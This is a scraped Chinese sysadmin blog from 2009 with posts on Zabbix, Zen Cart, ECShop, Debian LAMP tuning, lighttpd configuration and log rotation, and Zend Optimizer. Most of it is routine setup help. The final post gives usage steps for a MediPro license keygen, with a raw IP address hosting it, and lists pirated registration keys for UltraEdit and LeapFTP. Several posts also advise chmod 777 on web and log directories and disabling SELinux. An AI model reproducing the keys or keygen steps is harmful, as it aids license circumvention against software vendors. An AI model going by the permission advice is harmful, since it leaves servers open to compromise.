ZABBIX_AGENTD=$BASEDIR/sbin/zabbix_agentd

配置文件
-bash-3.1# mkdir /etc/zabbix
-bash-3.1# chown -R zabbix.zabbix /etc/zabbix/
-bash-3.1# cp misc/conf/zabbix_* /etc/zabbix/

关闭启动的相关命令是：
-bash-3.1# /etc/init.d/zabbix_server_ctl start|stop|restart
-bash-3.1# /etc/init.d/zabbix_agentd_ctl start|stop|restart

安装自启动服务
-bash-3.1# chkconfig –add zabbix-server
-bash-3.1# chkconfig –add zabbix-agent
-bash-3.1# chkconfig zabbix-server on
-bash-3.1# chkconfig zabbix-agent on

复制zabbix网页文件到apacheroot目录
-bash-3.1# mkdir /var/www/html/zabbix
-bash-3.1# cp -Rpf frontends/php/* /var/www/html/zabbix

下面开启服务端以及客户端：
-bash-3.1# /etc/init.d/zabbix_server_ctl start
-bash-3.1# /etc/init.d/zabbix_agentd_ctl start

五、登录http://ip/zabbix
有问题或者Fail请看页面上的提示，很简单就能解决
默认登录用户名admin密码zabbix

zencart 常用操作技巧

admin — Sun, 30 Aug 2009 23:59:08 +0000

有关Zen-cart有一切……

去掉产品目录旁边的产品总数方法

在管理后台里，进入”Configuration” —> “My Store” —> “Show Category Counts”选项，设置为关即可。

目录后面会有一个烦锁的小箭头->

按Zen-cart的默认配置，目录后面有->(12356)这样风格的统计数字显示。如何去掉呢？

在管理后台里，进入”Configuration” —> “Layout Settings” —> “Categories Separator between the Category Name and Count”选项，按你的需要设置即可。

在Zen-cart里如何修改”Powered by Zen Cart”的内容?

这个可以在后台My Store->footer text body里进行修改，也可以到FTP里的/include/template/你的模板/common/tpl_footer.php里进行修改。

页眉下面有一大堆烦锁的Categories tags，怎么去掉？

后台管理 —> Configuration —> Layout Settings —> Categories-Tabs Menu ON/OFF

把这个属性设为关闭即可！

怎么修改Contact Us的页面内容与风格？

如果是内容的话，在后台管理的Tools —> Define Pages Editor里进行页面内容的修改。

如果是风格的话，在CSS文件里找到对应的id或是class名进行修改。

如果是要修改显示内容的话，在你的模板目录下的templates/tpl_contact_us_default.php里修改，如果你重写页面内容的话，请在common文件夹下找到相应的文件进行修改。

打开产品根目录后，会显示子目录的排列图标，这个东西怎么修改？

在模板目录下的common/tpl_columnar_display.php文件里，修改显示的内容。

浏览器的抬头上写着”Zen Cart!, The Art of …”，怎么修改？

打开文件includes/languages/english/meta_tags.php，在里面找到下面这段

// page title define(’TITLE’, ‘Zen Cart!’);

// Site Tagline define(’SITE_TAGLINE’, ‘The Art of E-commerce’);

把这些文字替换掉就可以。当然，如果你是中文的页面，就要到相应的文件夹下面去找。

我想把左、中、右三栏之间留一点空隙怎么办？

Zen-cart默认把左侧栏、中间产品栏、右侧栏排列得很紧密，我想把三间之间的两个空隙弄小一些，怎么办？

只要按这个方法，你可以随意调节三者之间的空隙大小。

在后台Configuration —> Layout Setting中，仔细调节

Column Width – Left Boxes

Column Width – Right Boxes

和

Column Width -Left

Column Width – Right

的值，上面的这类带有Boxes的，是设定显示给我们看的box的大小，而没有Boxes的这类值，则是显示背景的大小。

只要你把下面的值设得比上面的值大，就有空隙出来。

刚安装好的Zen-cart，如何修改首页的Congratulations! you have successfully installed…

If you want to change “Congratulations! You have successfully installed your Zen Cart; E-Commerce Solution” with your own text open the includes/languages/ENGLISH/index.php file and find the following code:

// This section deals with the “home” page at the top level with no options/products selected
/*Replace this text with the headline you would like for your shop. For example: ‘Welcome to My SHOP!’*/
define(’HEADING_TITLE’, ‘Congratulations! You have successfully installed your Zen Cart™ E-Commerce Solution.’);
} elseif ($category_depth == ‘nested’) {
// This section deals with displaying a subcategory
/*Replace this line with the headline you would like for your shop. For example: ‘Welcome to My SHOP!’/
define(’HEADING_TITLE’, ‘Congratulations! You have successfully installed your Zen Cart™ E-Commerce Solution.’);
}

Replace the text starting “Congratulations” with your own text. Make sure that the single quote marks are not left out.

如何修改左、右边框的显示风格？

修改文件common/tpl_box_default_left.php或common/tpl_box_default_left.php即可。

我得到一个空白页面，怎么调试呢？

最简单的方法，把以下代码加入到你的index.php里：

define(’STRICT_ERROR_REPORTING’, true);
?>

这样，你访问页面产生的错误消息就会输出到页面。当然，记得把这个关掉，如果你把错误fix掉的话，免得给用户看到。

我要单独修改Categories里的内容，怎么办？

不单是Categories，所有的sidebox的内容，都可以在/includes/templates/YourTemplate/sideboxes文件夹里进行修改。

tpl_categories文件，就是修改Categories里面的显示内容的，当然，你修改里面的CSS标签，就修改Categories的样式。

你可以通过common/tpl_box_default_left.php和common/tpl_box_default_right.php这两个文件来对左栏和右栏的内容进行大的调整。

一般来说，你只要修改sideboxes里面对应的文件就能搞定你所需要的东西。

给xoops 安装上zencart模块，解决后台login页面错误

admin — Thu, 27 Aug 2009 17:21:22 +0000

Using Xoops 2.3.2b. Using Zen Cart Xoops 0.3. Cannot log into the admin either via xoops or via Admin Url : /modules/shop/admin. Page freezes.
I get this error..

Fatal error: Call to a member function Execute() on a non-object in /home/tiger/evan/lighttpd/hunttech/xoops/index/modules/shop/includes/functions/sessions.php on line 61

This is line 61…

$total = $db->Execute($qid);

I had the same issue. The solution is to modify the \admin\includes\config.php file. Change the line:

define(‘STORE_SESSIONS’, ‘db’); // leave empty ” for default handler or set to ‘db’

To:

define(‘STORE_SESSIONS’, ”); // leave empty ” for default handler or set to ‘db’

You should now be able to log into the Admin area.

终于搞明白ecshop后台的文章编辑功能不能用的原因

admin — Wed, 19 Aug 2009 01:54:16 +0000

终于搞明白ecshop后台的文章编辑功能不能用的原因。自从今年的五月低开始，俺在网上搭建的基于ECSHOP的商城的文章编辑功能就不能用。。。俺一直在查找原因。一直在想问题出在哪里。今天终于让俺找到问题所在，原来还是lighttpd的5678 端口跟nginx没有衔接好的原因：

例如：俺在后台随便打开一篇文章来编辑。不是显示空白，就是显示js报错信息。以下为JS报错信息：
网页错误详细信息

用户代理: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
时间戳: Thu, 20 Aug 2009 15:36:57 UTC

消息: 缺少 ‘}’
行: 32
字符: 10099
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/editor/js/fckeditorcode_ie.js

消息: ‘FCKConfig’ 未定义
行: 27
字符: 1
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/fckconfig.js

消息: ‘FCKBrowserInfo’ 未定义
行: 125
字符: 1
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/editor/fckeditor.html?InstanceName=FCKeditor1&Toolbar=Normal

消息: 缺少对象
行: 164
字符: 1
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/editor/fckeditor.html?InstanceName=FCKeditor1&Toolbar=Normal

消息: ‘FCKTools’ 未定义
行: 176
字符: 1
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/editor/fckeditor.html?InstanceName=FCKeditor1&Toolbar=Normal

消息: 缺少对象
行: 195
字符: 1
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/editor/fckeditor.html?InstanceName=FCKeditor1&Toolbar=Normal

消息: ‘FCKLang’ 未定义
行: 203
字符: 1
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/editor/fckeditor.html?InstanceName=FCKeditor1&Toolbar=Normal

消息: ‘FCKBrowserInfo’ 未定义
行: 270
字符: 1
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/editor/fckeditor.html?InstanceName=FCKeditor1&Toolbar=Normal

消息: 缺少对象
行: 210
字符: 2
代码: 0
URI: http://www.luckties.cn/includes/fckeditor/editor/fckeditor.html?InstanceName=FCKeditor1&Toolbar=Normal

俺上网查了查，有人说是fckedit编辑器问题。有人说是服务器空间有问题。俺一直得不到明确的答案。该问题也一直得不到解决。今天，俺灵机一动。想想会不会又是lighttpd的5678端口问题？因而，在文章所对应的网址后面加上5678.终于可以见到文章内容，以及相对应的fckedit编辑框。。。。俺记得五月份之前都是正常的。都是好的。端午节就不行。那问题应该是出在nginx的配置方面。没有对lighttpd的5678端口作出正确配置。因而，累至这个问题一直存在。。。。

Debian 配置 LAMP (debian5.0+apache2.2+mysql5.0+php5.0 )

admin — Sat, 08 Aug 2009 07:17:11 +0000

一、安装基本程式
~#apt-get install apache2 mysql-server php5 php5-mysql phpmyadin pear php5-gd
#在安装过程序会提示你设置mysql的root用户密码。

在Debian下只要安装相关软体，无需修改任何配置文件，把网页程序上传到/var/www目录，更改权限为777，服务器就能够工作！
二、LAMP简单配置
经过前面的步骤，服务器就能够正常运行，但是有时候达不到我们的要求，所以掌握基本配置方法是很有必要的。

1、建立mysql数据库，并添一个仅拥有这些数据库权限的用户，以便网页程序使用，提高服务器的安全性。
~#mysql -h127.1 -uroot -pabcabc
#连接mysql服务器，其中-h是主机，-u是用户名，-p是密码。注意各参数与附值之间没有空格。
> create database lamp;
#创建数据库lamp，注意mysql内部命令必需以“;”结尾。
>show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| lamp |
| mysql |
+——————–+
4 rows in set (0.00 sec)
#查看数据库。
>grant all on lamp.* to lyb@localhost identified by ‘abc123′;
#建立用户名lyb，只允许本地登录，密码为“abc123”，仅拥有数据库lamp的完全权限。l

2、apache2配置文件介绍。
Debian 5.0 的apache2的配置文件全在/etc/apache2/目录下面。
apache2.conf
#apache的全局配置文件。
envvars
#定义apache的用户环境。
ports.conf
#定义监听端口。
httpd.conf
#默认为空文件，一般用户自已添加的选项写入这里。
mods-available
#以load文件结尾的是加载相应模块选项，以conf文件结尾的是相应模块选项。
mods-enabled
#都是指向mods-available下面的文件的链接文件，需要启用那些模块就在此建立相关链接即可。
sites-available
#虚拟主机配置文件
sites-enabled
#指向sites-available目录下文件的链接。
conf.d
#定义字符编码和其它选项。
三、性能调优
1、内核优化，vim /etc/sysctl.conf
# Use TCP syncookies when needed
net.ipv4.tcp_syncookies = 1
# Enable TCP window scaling
net.ipv4.tcp_window_scaling: = 1
# Increase TCP max buffer size
net.core.rmem_max = 16777216
net.core.wmem_max = 16777216
# Increase Linux autotuning TCP buffer limits
net.ipv4.tcp_rmem = 4096 87380 16777216
net.ipv4.tcp_wmem = 4096 65536 16777216
# Increase number of ports available
net.ipv4.ip_local_port_range = 1024 65000
2、优化磁盘
在文件系统上禁用 atime 日志记录特性。atime 是最近访问文件的时间，每当访问文件时，底层文件系统必须记录这个时间戳。因为系统管理员很少使用atime，禁用它可以减少磁盘访问时间。禁用这个特性的方法是，在 /etc/fstab 的第四列中添加 noatime 选项。
例如：LABEL=/boot /boot ext3 defaults,noatime 1 2
3、调优Apache
需要伸缩性的站点可以选择worker或event线程化的MPM，而需要稳定性和兼容性的站点可以用prefork。
一个经典 worker MPM 配置：
ServerLimit 128
StartServers 8
MaxClients 3000
MinSpareThreads 128
MaxSpareThreads 1024
ThreadsPerChild 32
一个 perfoxk MPM 配置实例：
StartServers 32
MinSpareServers 32
MaxSpareServers 64
MaxClients 1024
MaxRequestsPerChild 4000

有效的使用选项和重写

AllowOverride None
Options FollowSymLinks

如果使用 -FollowSymLinks，该特性就会被禁用。如果禁用了 FollowSymLinks，Apache 就必须检查使用该文件名的所有组件（目录和文件本身），以确保它们不是符号连接。这会带来额外的开销（磁盘操作）。
AllowOverride None 是不允许重写，这能消除 Apache 检查 .htaccess 的需求。
HostnameLookups off 指令禁用 DNS 查找，因为试图反向解析连接到您的服务器的所有 IP 地址无疑是浪费资源。

持久连接
KeepAlive On
KeepAliveTimeout 5

关闭DNS查询
HostnameLookups off

合理配置缓冲模块
mod_cache
mod_disk_cache
mod_mem_cache
mod_file_cache

4、优化 php.ini ，四个重要的控制设置 PHP 可以使用多少系统资源。
max_execution_time 一个脚本可使用多少 CPU 秒，建议值 30
max_input_time 一个脚本等待输入数据的时间有多长（秒），建议值 60
memory_limit 在被取消之前，一个脚本可使用多少内存（字节），建议值 32M
output_buffering 数据发送给客户机之前，有多少数据（字节）需要缓存，建议值 4096
PHP 可执行的日志记录数是可配置的。在生产环境中，禁用除最重要的日志以外的一切日志记录能够减少磁盘写操作。如果需要使用日志来排除问题，那么可以按需启用日志记录。error_reporting = E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR 将启用足够的日志记录，使您发现问题，同时从脚本中消除大量无用的内容。
5、优化MySQL
参考：
三、应用 php 加速
1、安装 XCache 或 eAccelerator
下载：apt-get install php5-xcache
下载：http://bart.eaccelerator.net/source/0.9.5.3/eaccelerator-0.9.5.3.tar.bz2

非常好的lighttpd 安装配置说明文档

admin — Sat, 01 Aug 2009 06:38:25 +0000

一，为什么要使用lighttpd?
apache不可以吗？
在支持纯静态的对象时，比如图片，文件等，
lighttpd速度更快，更理想
至于它和apache的比较，很多文档，大家可以google一下

二，从何处下载lighttpd?

http://www.lighttpd.net/download/

这个是它的官方站

三，如何安装？
1,编译安装
./configure –prefix=/usr/local/lighttpd
make
make install

configure完毕以后，会给出一个激活的模块和没有激活模块的清单，可以检查一下，是否自己需要的模块都已经激活，在enable的模块中一定要有“mod_rewrite”这一项，否则重新检查pcre是否安装。

2,编译后配置
cp doc/sysconfig.lighttpd /etc/sysconfig/lighttpd
mkdir /etc/lighttpd
cp doc/lighttpd.conf /etc/lighttpd/lighttpd.conf

如果你的Linux是RedHat/CentOS，那么：
cp doc/rc.lighttpd.redhat /etc/init.d/lighttpd
如果你的Linux是SuSE，那么：
cp doc/rc.lighttpd /etc/init.d/lighttpd
其他Linux发行版本可以自行参考该文件内容进行修改。
然后修改/etc/init.d/lighttpd，把
LIGHTTPD_BIN=/usr/sbin/lighttpd
改为
LIGHTTPD_BIN=/usr/local/lighttpd/sbin/lighttpd

此脚本用来控制lighttpd的启动关闭和重起：
/etc/init.d/lighttpd start
/etc/init.d/lighttpd stop
/etc/init.d/lighttpd restart
3,配置
修改/etc/lighttpd/lighttpd.conf
1）server.modules
取消需要用到模块的注释，mod_rewrite，mod_access，mod_fastcgi，mod_simple_vhost，mod_cgi， mod_compress，mod_accesslog是一般需要用到的。
我们放开 “mod_rewrite”
“mod_compress”,

2）server.document-root, server.error-log，accesslog.filename需要指定相应的目录
server.document-root = “/www/phc/html/”
mkdir /usr/local/lighttpd/logs
chmod 777 /usr/local/lighttpd/logs/
touch /usr/local/lighttpd/logs/error.log
chmod 777 /usr/local/lighttpd/logs/error.log

server.errorlog = “/usr/local/lighttpd/logs/error.log”
accesslog.filename = “|/usr/sbin/cronolog /usr/local/lighttpd/logs/%Y/%m/%d/accesslog.log”

3）用什么权限来运行lighttpd
server.username = “nobody”
server.groupname = “nobody”
从安全角度来说，不建议用root权限运行web server，可以自行指定普通用户权限。

4）静态文件压缩
mkdir /usr/local/lighttpd/compress
chmod 777 /usr/local/lighttpd/compress/
compress.cache-dir = “/usr/local/lighttpd/compress/”
compress.filetype = (“text/plain”, “text/html”,”text/javascript”,”text/css”)

可以指定某些静态资源类型使用压缩方式传输，节省带宽，
对于大量AJAX应用来说，可以极大提高页面加载速度。

5）server.port = 81

6）#$HTTP["url"] =~ “.pdf$” {
131 # server.range-requests = “disable”
132 #}

4，优化
1 最大连接数

默认是1024
修改 server.max-fds,大流量网站推荐2048.

因为lighttpd基于线程,而apache(MPM-prefork)基于子进程,
所以apache需要设置startservers,maxclients等,这里不需要
2 stat() 缓存

stat() 这样的系统调用,开销也是相当明显的.
缓存能够节约时间和环境切换次数(context switches)

一句话,lighttpd.conf加上
server.stat-cache-engine = “fam”

lighttpd还另外提供simple(缓存1秒内的stat()),disabled选项.
相信没人会选disabled吧.
3 常连接(HTTP Keep-Alive)

一般来说,一个系统能够打开的文件个数是有限制的(文件描述符限制)
常连接占用文件描述符,对非并发的访问没有什么意义.

(文件描述符的数量和许多原因有关,比如日志文件数量,并发数目等)

这是lighttpd在keep-alive方面的默认值.
server.max-keep-alive-requests = 128
server.max-keep-alive-idle = 30

换言之,lighttpd最多可以同时承受30秒长的常连接,每个连接最多请求128个文件.
但这个默认值确实不适合非并发这种多数情况.

lighttpd.conf 中减小
server.max-keep-alive-requests
server.max-keep-alive-idle
两个值,可以减缓这种现象.

甚至可以关闭lighttpd keep-alive.
server.max-keep-alive-requests = 0
4 事件处理

对于linux kernel 2.6来说,没有别的可说
lighttpd.conf中加上这一句足矣
server.event-handler = “linux-sysepoll”

另外,
linux 2.4 使用 linux-rtsig
freebsd 使用 freebsd-kqueue
unix 使用 poll
5 网络处理

lighttpd 大量使用了 sendfile() 这样一个高效的系统调用.
减少了从应用程序到网卡间的距离.
(同时也减少了lighttpd对cpu的占用,这部分占用转嫁到内核身上了)

根据平台,可以设置不同的参数.
server.network-backend = “linux-sendfile”
(linux)
freebsd: freebsd-sendfile
unix: writev

如果有兴趣的话,也可以看看lighttpd在async io(aio)上的实现,仅限 lighttpd 1.5
(linux-aio-sendfile, posix-aio, gthread-aio)

此外,网络方面,核心的参数也需要适当进行修改,
这里就不需要详细说明了.

5,启动
6,配置日志
logrotate & cronolog
logrotate很粗暴,直接把进程砍了然后移动日志
cronolog就是比较不错的方式.
lighttpd用法:
accesslog.filename = ” |/usr/sbin/cronolog /var/log/lighttpd/%Y/%m/%d/access_XXXX.log”

7,安装pcre
从何处下载?

http://www.pcre.org/

wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-7.4.tar.bz2
安装过程：
　　./configure
　　make clean
　　make
　　make install

8,支持fam
gamin默认已安装了此包
yum install gamin-devel

另外配置时需添加：
./configure –prefix=/usr/local/lighttpd –with-fam

9,测试lighttpd的启动：
/usr/local/lighttpd/sbin/lighttpd -f /usr/local/lighttpd/etc/lighttpd.conf

10,防止盗链
#$HTTP["referer"] !~ “^($|http://.*.(chinafotopress.com|chinafotopress.cn))” {
# $HTTP["url"] =~ “.(jpg|jpeg|png|gif|rar|zip|mp3)$” {
# #url.redirect = (“.*” => “http://www.baidu.com/”)
# url.access-deny = (“.jpg”)
# }
#}

#$HTTP["referer"] == “” {
# $HTTP["url"] =~ “.(jpg|jpeg|png|gif|rar|zip|mp3)$” {
# #url.redirect = (“.*” => “http://www.baidu.com/”)
# url.access-deny = (“.jpg”)
# }
#}

日志处理

Sometimes, Google Analytics just isn’t enough when it comes to keeping and interpreting server stats. After finding a suitable log file analyzer, AWStats, the next step involved separating out the log files on a per domain basis. When the server was first set up, everything was shuttled to one set of access and error log files. While AWStats could technically analyze this log, the suggested set up involves having one set per domain. This article details the process of separating out the log files and making sure that these new files get rotated correctly.
Create Log Directories

While it would be possible to keep all of the files in one directory and to just name them relative to the domain, for this tutorial we will assume that we will create subdirectories based on the domain name. The first step would be to create a directory for each domain.

sudo -u www-data mkdir /var/log/lighttpd/www.example1.com
sudo -u www-data mkdir /var/log/lighttpd/www.example2.com
Update lighttpd.conf

After creating the directories, it’s time to update the lighttpd conf file in /etc/lighttpd. We’ll want to set the log files by host name. We already had directives setting the server.document-root for these domains so we only added the bolded lines.

$HTTP["host"] =~ “(^|\.)example1.com”$” {
server.document-root = “/var/www/www.example1.com”,
server.errorlog = “/var/log/lighttpd/www.example1.com/error.log”,
accesslog.filename = “/var/log/lighttpd/www.example1.com/access.log”,
}

$HTTP["host"] =~ “(^|\.)example2.com$” {
server.document-root = “/var/www/www.example2.com”,
server.errorlog = “/var/log/lighttpd/www.example2.com/error.log”,
accesslog.filename = “/var/log/lighttpd/www.example2.com/access.log”,
}

After adding these directives, you will need to restart the server.

sudo /etc/init.d/lighttpd restart
Update Logrotate

Finally, we will want logrotate to rotate these new directories. Since our main goal is to integrate the logs with AWStats, it made sense to add a separate entry for each log directory. However, if you don’t need call different scripts for the different domains, feel free to create one directive. We just copied the existing logrotate configuration and editted it for each of the domains. Below are examples of what this might look like.

/var/log/lighttpd/*.log {
daily
missingok
copytruncate
rotate 60
compress
notifempty
sharedscripts
postrotate
if [ -f /var/run/lighttpd.pid ]; then \
kill -HUP $(
fi;
endscript
}
/var/log/lighttpd/www.example1.com/*.log {
daily
missingok
copytruncate
rotate 60
compress
notifempty
sharedscripts
postrotate
if [ -f /var/run/lighttpd.pid ]; then \
kill -HUP $(
fi;
endscript
}
/var/log/lighttpd/www.example2.com/*.log {
daily
missingok
copytruncate
rotate 60
compress
notifempty
sharedscripts
postrotate
if [ -f /var/run/lighttpd.pid ]; then \
kill -HUP $(
fi;
endscript
}

To make just one configuration entry, it would look like this:

“/var/log/lighttpd/*.log” “/var/log/lighttpd/www.example1.com/*.log” “/var/log/lighttpd/www.example2.com/*.log” {
daily
missingok
copytruncate
rotate 60
compress
notifempty
sharedscripts
postrotate
if [ -f /var/run/lighttpd.pid ]; then \
kill -HUP $(
fi;
endscript
}
Sources

* Lighttpd rotating log files with logrotate tool
* Howto: Lighttpd web server setting up virtual hosting

Trackback URL for this post:

http://tracy.hurleyit.com/trackback/1140

lighttpd虚拟主机配置
$HTTP["host"] == “bbs.xxx.com” {
server.name = “bbs.xxx.com”
server.document-root = “/var/www/bbs”
server.errorlog = “/var/www/bbs/error.log”
accesslog.filename = “/var/www/bbs/access.log”
}
else

lighttpd.conf解释

server.use-ipv6 = “disable” # 缺省为禁用
server.event-handler = “linux-sysepoll” # Linux环境下epoll系统调用可提高吞吐量
#server.max-worker = 10 # 如果你的系统资源没跑满，可考虑调高 lighttpd进程数
server.max-fds = 4096 # 默认的，应该够用了，可根据实际情况调整
server.max-connections = 4096 # 默认等于 server.max-fds
server.network-backend = “linux-sendfile”
server.max-keep-alive-requests = 0 # 在一个keep-alive会话终止连接前能接受处理的最大请求数。0为禁止

# 设置要加载的module
server.modules = (
“mod_rewrite”,
“mod_redirect”,
# “mod_alias”,
“mod_access”,
# “mod_cml”,
# “mod_trigger_b4_dl”,
“mod_auth”,
“mod_expire”,
# “mod_status”,
# “mod_setenv”,
“mod_proxy_core”,
“mod_proxy_backend_http”,
“mod_proxy_backend_fastcgi”,
# “mod_proxy_backend_scgi”,
# “mod_proxy_backend_ajp13″,
# “mod_simple_vhost”,
“mod_evhost”,
# “mod_userdir”,
# “mod_cgi”,
“mod_compress”,
# “mod_ssi”,
# “mod_usertrack”,
# “mod_secdownload”,
# “mod_rrdtool”,
“mod_accesslog” )

# 网站根目录
server.document-root = “/var/www/”

# 错误日志位置
server.errorlog = “/var/log/lighttpd/error.log”

# 网站Index
index-file.names = ( “index.php”, “index.html”,
“index.htm”, “default.htm” )

# 访问日志, 以及日志格式 (combined), 使用X-Forwarded-For可越过代理读取真实ip
accesslog.filename = “/var/log/lighttpd/access.log”
accesslog.format = “%{X-Forwarded-For}i %v %u %t \”%r\” %s %b \”%{User-Agent}i\” \”%{Referer}i\”"

# 设置禁止访问的文件扩展名
url.access-deny = ( “~”, “.inc”, “.tpl” )

# 服务监听端口
server.port = 80

# 进程id记录位置
server.pid-file = “/var/run/lighttpd.pid”

# virtual directory listings 如果没有找到index文件就列出目录。建议disable。
dir-listing.activate = “disable”

# 服务运行使用的用户及用户组
server.username = “www”
server.groupname = “www”

# gzip压缩存放的目录以及需要压缩的文件类型
compress.cache-dir = “/tmp/lighttpd/cache/compress/”
compress.filetype = (“text/plain”, “text/html”)

# fastcgi module
# for PHP don’t forget to set cgi.fix_pathinfo = 1 in the php.ini
$HTTP["url"] =~ “\.php$” {
proxy-core.balancer = “round-robin”
proxy-core.allow-x-sendfile = “enable”
# proxy-core.check-local = “enable”
proxy-core.protocol = “fastcgi”
proxy-core.backends = ( “unix:/tmp/php-fastcgi1.sock”,”unix:/tmp/php-fastcgi2.sock” )
proxy-core.max-pool-size = 16
}

# 权限控制
auth.backend = “htpasswd”
auth.backend.htpasswd.userfile = “/var/www/htpasswd.userfile”

# 基于 evhost 的虚拟主机针对域名
$HTTP["host"] == “a.lostk.com” {
server.document-root = “/var/www/lostk/”
server.errorlog = “/var/log/lighttpd/lostk-error.log”
accesslog.filename = “/var/log/lighttpd/lostk-access.log”

# 设定文件过期时间
expire.url = (
“/css/” => “access 2 hours”,
“/js/” => “access 2 hours”,
)

# url 跳转
url.redirect = (
“^/$” => “/xxx/index.html”,
)

# url 重写 (cakephp可用)
url.rewrite = (
“^/(css|js)/(.*)$” => “/$1/$2″,
“^/([^.]+)$” => “/index.php?url=$1″,
)

# 权限控制
auth.require = ( “” =>
(
“method” => “basic”,
“realm” => “admin only”,
“require” => “user=admin1|user=admin2″ # 允许的用户, 用户列表文件在上面配置的auth.backend.htpasswd.userfile 里
),
)
}

# 针对端口的虚拟主机
$SERVER["socket"] == “192.168.0.1:8000″ {
server.document-root = “/var/www/xxx/”
server.errorlog = “/var/log/lighttpd/test-error.log”
accesslog.filename = “/var/log/lighttpd/test-access.log”

linux 下的lighttpd不能加载zend Optimizer的解决方法

admin — Sat, 01 Aug 2009 06:36:21 +0000

在 Fedora 10 安装 lighttpd php5 mysql5 zend Optimizer前 3个均可以用 yum 进行安装，很方便。

　　在 Fedora 10 安装 lighttpd php5 mysql5 zend Optimizer

　　前 3个均可以用 yum 进行安装，很方便。

　　而 zend Optimizer 需要下载解压后，到解压目录输入 # ./install.sh 就会出现界面提示安装。安装后重启 lighttpd却没有成功启动 zend Optimizer 。

　　解决经过：

　　1. 开始认为是 php.ini 没有设置好。打目录中找 #find / -name php.ini ，后发现网页输出就有 Loaded Configuration File : /usr/local/Zend/etc/php.ini 显示 php.ini 文件已被加载。

　　2. 是否 zend Optimizer 版本问题,安装最新版还是不成功。

　　3. 在网络查找解决方法多是说 php.ini 设置问题。最终将几个方法总结才解决：

　　具体解决方法:

　　1. 对于 php.ini文件路径有问题( 我的在 phpinfo()显示php.ini路径正确，我就不用这个方法 )

　　解决方法

　　php -i | grep php.ini 就可以找到当前php使用的php.ini文件

　　比如, 编译安装时没有指定php.ini存放路径, 那么默认php.ini会放在/usr/local/lib下面

　　最好是在编译PHP时指定PHP配置文件的路径如: –with-config-file-path=/usr/local/etc

　　而一般zend默认安装 php.ini在/etc/目录下面或/usr/local/Zend/etc 所以需要在安装的时候手工指定我们php.ini文件存放的位置

　　如果, 不知道现在的PHP 的配置文件具体位置的话可以查看一下:

　　php -i | grep php.ini

　　如果php optimizer安装好却发现不能加载的话可以手工指定读取php.ini文件的位置

　　php -c /etc/ -v 如果可以看到zend opt正确加载

　　那么做个连接就好连接到php默认读取的php.ini路径下面

　　
比如

　　ln -sf /etc/php.ini /usr/local/lib

　　[root@localhost /]# php -v

HP 5.2.5 (cli) (built: Jan 22 2006 12:59:19)

　　Ok 正常 phpinfo()看到的当然也是一样的

　　2. 调用库文件的问题

　　有的时候还有一些情况下 php -i 或php -v 在控制台下可以看到zend opt,

　　但是 apache 执行phpinfo的输出里面却看不到

　　一般是因为调用php的时候zend模块不能加载, 比如AS4里面就是这样的

　　如as4下面默认的php安装后读取库文件的路径是在/usr/lib下面，

　　而php.ini文件中加载zend模块是在zend安装路径的lib目录中

　　比如/usr/local/Zend/lib 这时apache在执行php时不能加载zend模块所以在控制台里php -v 可以正常

　　但是apache 却没有加载zend。

　　解决办法

　　先把zend模块copy到

　　/usr/lib里面然后改一下php.ini里面zend加载模块部分

　　( 我在 php -i 中显示 Failed loading /usr/local/Zend/lib/Optimizer-3.3.0/php-5.2.x/ZendOptimizer.so: /usr/local/Zend/lib/Optimizer-3.3.0/php-5.2.x/ZendOptimizer.so: cannot restore segment prot after reloc: Permission denied

　　看这个原来是权限问题)

　　3. 最恶心的SElinux问题

　　SElinux导致PHP不能使用zend/lib下的库文件。所以，即便是做link也不行。只能够拷贝库文件到有权限的目录。或者直接关掉SElinux

　　但我已在 /etc/selinux/config 的 SELINUX=disabled 关掉SElinux 还是不行, 再网络查询发现

　　在你保证SElinux 被disable后.还执行下

　　chcon -t texrel_shlib_t 命令

　　如: chcon -t texrel_shlib_t /usr/local/Zend/lib/Optimizer-3.3.0/php-5.2.x/ZendOptimizer.so (这个文件视具体执行文件.)

　　就可以。

　　我的解决的情况是:

　　1. 关闭SElinux

　　2. 运行 #chcon -t texrel_shlib_t /usr/local/Zend/lib/Optimizer-3.3.0/php-5.2.x/ZendOptimizer.so

　　就可以。

还有一个最终的解决办法，就是使用低版本的php源代码来编译安装php.

有用的常用软件及命令设置参数记录

admin — Sat, 01 Aug 2009 06:34:21 +0000

1、php 源代码编译参数
./configure –prefix=/home/tiger/evan/php5-fastcgi –with-mysql=/usr/local/mysql –enable-gd-native-ttf –with-gd –enable-ftp –with-iconv –with-gettext –enable-fastcgi –enable-zend-multibyte –without-pear –enable-force-cgi-redirect –enable-discard-path –with-bz2 –enable-zip –with-calendar –enable-mbstring –with-curl –enable-exif –with-xmlrpc –enable-soap –enable-sockets –enable-dba –with-gdbm –with-kerberos –enable-pcntl –with-zlib –with-config-file-path=/home/tiger/evan/etc

make && make test && make clean && make install

2、tar.bz2解压命令

tar.bz2 解压命令。收藏
bzip2 -d gcc-4.1.0.tar.bz2
—上面解压完之后执行下面的命令。

tar -xvf gcc-4.1.0.tar 或 tar -xvf *.tar
解完之后会出现多一个文件夹 gcc-4.1.0

3、mysql 重启命令 (debian/ubuntu平台）
/etc/init.d/mysql restart
4、MediPro名典注册机
名典, MediPro, 注册机
使用说明：
1.把注册机放在php网站空间内，运行（注意，最好是与要注册的企业网站放在相同的空间里！！）

2.先安装网站！！再运行注册机，把注册机的显示结果复制下来.

3.网站的目录有个license.php文件，用注册机的结果替换相应的内容.

4.为了保密，注册机的结果故意少显示’ ?> (英文状态)，自己加上.

http://202.101.161.115:515/medi_key.php

http://www.weboss.cn/

5、UltraEdit-32 v15.00注册码：
free user
GGCDP-KIOGN-KQHLZ-RNCSK-KKKHZ-PILKV-OQCKS-TKATB

6、leapftp3.0注册码：
key=tRa8uNSdl4bKMjZEi1hRwzrG
j5d4yjMtwp2RD+x9ZxusjUO2bRVX
6i+wxi1rdwiNrTFQbClQO9AWBeAq
zeRa5bbMtL5mJZeHBbh9QBIIPw7f
kLNC0hFfKWGUoKnLPRvztMBGyxGK
xhlxfPjlC0kV3cI1Zs7WPxdGPt+U
